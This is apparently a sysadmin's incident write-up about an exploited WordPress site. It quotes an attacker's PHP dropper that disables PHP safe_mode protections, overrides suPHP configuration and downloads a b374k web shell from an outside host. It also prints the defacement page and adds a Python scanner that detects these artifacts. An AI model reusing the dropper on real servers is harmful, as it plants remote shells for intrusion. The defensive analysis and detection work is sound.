Came across this in the wild today. Someone exploited an out-of-date WordPress installation on a VM we were hosting for a customer. Due to the sloppiness of the escalation attempts, it looks like the work of a true script kiddie.
The root web directory was left a total mess. Although the defacement was successful (which was just replacing the index.php file), none of the other attempts succeeded, and the attacker failed to break out of the VM or leverage any authority on the system. Compressed the bad files and replaced the website and SQL database with the backups, changed the FTP and SQL passwords and *ta da*, fixed.
The attempted PHP foo:
<?
/*
* Title : Bypass Server [ Sfa7 Trick ]
* Coder : Dr.KroOoZ
* Home : sec4ever.com
* Greets To : b0x
* Must Upload Like Here : /home/user/www/ | http://localhost.com/bypass.php
* Password Shell is : b374k
*/
# Mkdir
$dir = "mkdir";
$bb = $dir('ARGENTINA');
if($bb){
echo "[ARGENTINA] => Folder Create Complate !";
} else {
echo "[ARGENTINA] Error !";
}
# php.ini
$ARGENTINA = fopen('ARGENTINA/php.ini', 'w');
$sec = "safe_mode = OFF
disable_funtions = NONE";
fwrite($ARGENTINA ,$sec);
fclose($ARGENTINA);
if($ARGENTINA){
echo "<br>[php.ini] => Create Complate !";
} else {
echo "<br>[php.ini] Error !";
}
# .htaccess
$create = fopen("ARGENTINA/.htaccess", 'w');
$s3c = "suPHP_ConfigPath /home/".get_current_user()."/public_html/ARGENTINA/php.ini";
fwrite($create ,$s3c);
fclose($create);
if($create) {
echo "<br>[.htaccess] => Create Complate !";
} else {
echo "<br>[.htaccess] Error !";
}
# Shell
$b37 = 'http://site.com/';
$sh = file_get_contents($b37);
$open = fopen('ARGENTINA/krz.php', 'w');
fwrite($open,$sh);
fclose($open);
if($open) {
echo "<br>[ARGENTINA.php] => Shell Upload Complate !";
} else {
echo "<br>[ARGENTINA.php] => Error !";
}
?>
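The dropper above leaves a very recognisable footprint: a new directory under the web root holding a php.ini that relaxes safe_mode/disable_functions, an .htaccess that points suPHP_ConfigPath at it, and a fetched PHP file carrying the b374k shell header. A small defender-side scanner for exactly those artifacts follows. This is an added example, not code from the original post; the function names (scan_webroot, build_sample_webroot), the detection patterns and the sample web root it builds in a temporary directory are all my own constructions, with the directory name and file contents mirroring what the post shows.

```python
"""Scan a web root for the artifacts a suPHP / php.ini bypass dropper leaves behind.

Added example (not from the original post). Given a web root, it flags:
  - php.ini files that try to turn safe_mode off or clear disable_functions,
  - .htaccess files carrying a suPHP_ConfigPath override,
  - PHP files containing the web-shell marker seen in the post ("b374k").
The web root it scans in __main__ is constructed in a temp directory.
"""
import os
import re
import shutil
import tempfile

# Patterns are deliberately tolerant of the attacker's own typo
# ("disable_funtions"): a misspelled directive is still an attempt.
PHP_INI_PATTERNS = [
    re.compile(r"^\s*safe_mode\s*=\s*off\b", re.I | re.M),
    re.compile(r"^\s*disable_fun\w*\s*=\s*none\b", re.I | re.M),
]
HTACCESS_PATTERN = re.compile(r"^\s*suPHP_ConfigPath\b", re.I | re.M)
# Marker taken from the script header in the post; extend with your own IoCs.
SHELL_MARKERS = [re.compile(r"b374k", re.I)]


def _read(path):
    """Read a file as text, tolerating binary junk; unreadable files yield ''."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def scan_webroot(root):
    """Walk `root` and return a sorted list of (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            text = _read(path)
            if name == "php.ini":
                if any(p.search(text) for p in PHP_INI_PATTERNS):
                    findings.append((rel, "php.ini relaxes safe_mode/disable_functions"))
            elif name == ".htaccess":
                if HTACCESS_PATTERN.search(text):
                    findings.append((rel, ".htaccess sets suPHP_ConfigPath"))
            elif name.lower().endswith(".php"):
                if any(p.search(text) for p in SHELL_MARKERS):
                    findings.append((rel, "web-shell marker (b374k)"))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root mirroring the post's layout; return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        # legitimate-looking site files (constructed)
        "index.php": "<?php echo 'customer site'; ?>\n",
        "wp-config.php": "<?php define('DB_NAME', 'wp'); ?>\n",
        ".htaccess": "RewriteEngine On\n",
        # attacker artifacts, as laid down by the dropper in the post
        "ARGENTINA/php.ini": "safe_mode = OFF\ndisable_funtions = NONE",
        "ARGENTINA/.htaccess": "suPHP_ConfigPath /home/user/public_html/ARGENTINA/php.ini",
        "ARGENTINA/krz.php": "<?php\n/* Password Shell is : b374k */\n?>\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for rel, reason in scan_webroot(sample):
            print(f"{rel}: {reason}")
    finally:
        shutil.rmtree(sample, ignore_errors=True)
```

Point scan_webroot at the real document root rather than the sample; on the post's layout it reports only the three files under ARGENTINA and leaves the site's own .htaccess alone. A hit on any of the three is a strong signal on its own, but the full answer is the one the post gives: diff against a known-good backup, restore, and rotate every credential the web account could reach.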
The defacement:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="Shortcut Icon" href="http://i.hizliresim.com/eoLDm9.png" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>HACKED BY AYYILDIZ TEAM INTERNATIONAL FORCE</title>
<style type="text/css">
body {
background-color: #000000;
background-image: url(http://i.hizliresim.com/jzPL2W.jpg);
background-size:100%; margin:0px;padding:0px;
min-width:650px;
background-clip:box;
background-origin:padding-box;
background-repeat:no-repeat;
background-position:center;
background-attachment:fixed;}
.style14 {color: #FFFFFF; font-weight: bold; }
.style37 {
color: #F0F0F0;
font-weight: bold;
font-size: 10px;
}
.style38 {color: #9B0E0A}
.style40 {color: #600A0C; font-weight: bold; }
.style42 {
color: #333333;
font-weight: bold;
font-size: 14px;
}
.style43 {color: #D9120D}
</style>
</head>
<object type="application/x-shockwave-flash" width="17" height="17"data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&autoplay=true"><param name="movie"value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&song_title=uploadmusic.org&autoplay=true" /></object>
</body>
</html>